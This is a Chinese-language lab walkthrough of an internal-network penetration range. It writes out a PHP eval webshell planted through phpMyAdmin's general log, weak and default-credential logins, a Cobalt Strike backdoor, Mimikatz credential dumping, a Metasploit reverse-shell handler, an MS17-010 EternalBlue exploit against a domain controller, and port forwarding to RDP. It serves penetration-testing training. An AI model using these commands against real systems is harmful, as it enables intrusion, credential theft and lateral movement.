内网渗透靶场实验详细教学文档<\/h1>

0x01 靶场环境<\/h2>

网络拓扑结构：<\/strong><\/p>

攻击机：KALI (192.168.122.130)<\/li>
靶机：

Win7 (外网IP:192.168.122.142\/144; 内网IP:192.168.52.143)<\/li>
Win2008 (内网IP:192.168.52.138) - 域控<\/li>
Win08 (内网IP:192.168.52.141)<\/li> <\/ul> <\/li> <\/ul>
0x02 外网拿权限<\/h2>
方法一：通过phpMyAdmin弱口令getshell<\/h3>

信息收集：<\/strong><\/p>

端口扫描发现80和3306开放<\/li>
目录扫描发现phpMyAdmin路径<\/li> <\/ul> <\/li>

利用步骤：<\/strong><\/p>

使用弱口令root\/root登录phpMyAdmin<\/li>
开启general log并设置日志路径：
SET<\/span> global<\/span> general_log =<\/span> on<\/span>; <\/span><\/span>SET<\/span> global<\/span> general_log_file =<\/span> 'C:\/phpStudy\/WWW\/test.php'<\/span>; <\/span><\/span><\/code><\/pre><\/li> 执行SQL语句插入一句话木马： SELECT<\/span> '<?php eval($_POST["cmd"]);?>'<\/span>; <\/span><\/span><\/code><\/pre><\/li> 使用蚁剑连接test.php获取webshell<\/li> <\/ul> <\/li> <\/ol> 方法二：利用YXCMS漏洞getshell<\/h3> 发现后台：<\/strong><\/p> 通过robots.txt发现后台路径：\/index.php?r=admin\/index\/login<\/code><\/li> 使用默认凭证admin\/123456登录<\/li> <\/ul> <\/li> 写入webshell：<\/strong><\/p> 在前台模板功能中插入一句话木马<\/li> 通过robots.txt泄露的路径推测shell位置<\/li> 使用蚁剑连接shell_test.php<\/li> <\/ul> <\/li> <\/ol> 0x03 靶机后门上线<\/h2> Cobalt Strike后门植入<\/h3> 生成并上传后门：<\/strong><\/p> 生成exe格式的Cobalt Strike后门<\/li> 通过蚁剑上传到靶机并执行<\/li> <\/ul> <\/li> 信息收集：<\/strong><\/p> 执行系统命令收集信息<\/li> 探测域信息：net view \/domain<\/code><\/li> 使用Mimikatz抓取密码： mimikatz::sekurlsa::logonpasswords <\/code><\/pre> <\/li> 提权到SYSTEM权限<\/li> <\/ul> <\/li> <\/ol> 0x04 内网信息收集<\/h2> 判断域环境：<\/strong><\/p> ipconfig \/all<\/code>查看DNS服务器(god.org)<\/li> net time \/domain<\/code>确认域控(owa.god.org)<\/li> <\/ul> <\/li> 确认域控：<\/strong><\/p> net group "domain controllers" \/domain<\/code><\/li> 确认域控IP为192.168.52.138<\/li> <\/ul> <\/li> <\/ol> 0x05 内网横向移动<\/h2> SMB Beacon配置<\/h3> 创建SMB Listener<\/strong><\/p> 在Cobalt Strike中新建SMB类型的Listener<\/li> 在已有Beacon上右键Spawn选择SMB Listener<\/li> <\/ul> <\/li> 反弹shell给MSF：<\/strong><\/p> MSF配置： use exploit\/multi\/handler <\/span><\/span>set payload windows\/meterpreter\/reverse_tcp <\/span><\/span>set lhost 192.168.122.130 <\/span><\/span>set lport 8888<\/span> <\/span><\/span>exploit <\/span><\/span><\/code><\/pre><\/li> Cobalt Strike中创建对应Listener<\/li> <\/ul> <\/li> <\/ol> 内网扫描与攻击<\/h3> 配置路由：<\/strong><\/p> run get_local_subnets <\/span><\/span>run autoroute -s 192.168.52.0\/24 <\/span><\/span>run autoroute -p <\/span><\/span><\/code><\/pre><\/li> 扫描内网：<\/strong><\/p> 使用netbios模块扫描存活主机<\/li> 端口扫描发现445开放<\/li> <\/ul> <\/li> MS17-010攻击：<\/strong><\/p> use auxiliary\/scanner\/smb\/smb_ms17_010 <\/span><\/span>set rhosts 192.168.52.138 <\/span><\/span>run <\/span><\/span> <\/span><\/span>use exploit\/windows\/smb\/ms17_010_eternalblue <\/span><\/span>set payload windows\/x64\/meterpreter\/bind_tcp <\/span><\/span>set rhosts 192.168.52.138 <\/span><\/span>run <\/span><\/span><\/code><\/pre><\/li> 抓取凭证：<\/strong><\/p> load mimikatz <\/span><\/span>msv # 获取hash<\/span> <\/span><\/span>ssp # 获取明文<\/span> <\/span><\/span>wdigest # 获取明文<\/span> <\/span><\/span>kerberos # 获取明文<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 0x06 端口转发连接3389<\/h2> MSF端口转发<\/h3> portfwd add -l 9999<\/span> -r 192.168.52.138 -p 3389<\/span> <\/span><\/span><\/code><\/pre> 连接192.168.122.130:9999访问域控3389<\/li> <\/ul> Venom工具使用<\/h3> 环境搭建：<\/strong><\/p> KALI监听：.\/admin_linux_x64 -lport 4343<\/code><\/li> Win7连接：agent.exe -rhost 192.168.122.130 -rport 4343<\/code><\/li> 域控连接：agent.exe -rhost 192.168.52.143 -rport 4343<\/code><\/li> <\/ul> <\/li> 端口转发：<\/strong><\/p> goto 2<\/span> <\/span><\/span>rforward 192.168.52.138 3389<\/span> 9999<\/span> <\/span><\/span><\/code><\/pre> 远程连接KALI的9999端口访问域控<\/li> <\/ul> <\/li> <\/ol> 关键知识点总结<\/h2> 外网突破：<\/strong><\/p> 弱口令利用<\/li> 日志文件getshell<\/li> CMS已知漏洞利用<\/li> <\/ul> <\/li> 内网渗透：<\/strong><\/p> 信息收集(域环境判断)<\/li> 横向移动(SMB Beacon)<\/li> 漏洞利用(MS17-010)<\/li> <\/ul> <\/li> 权限维持：<\/strong><\/p> Cobalt Strike后门<\/li> 端口转发技术<\/li> 多级代理工具(Venom)<\/li> <\/ul> <\/li> 凭证获取：<\/strong><\/p> Mimikatz使用技巧<\/li> Hash与明文获取方法<\/li> <\/ul> <\/li> <\/ol> 本实验完整演示了从外网突破到内网横向移动的全过程，涵盖了多种渗透测试中常用的技术手段。<\/p>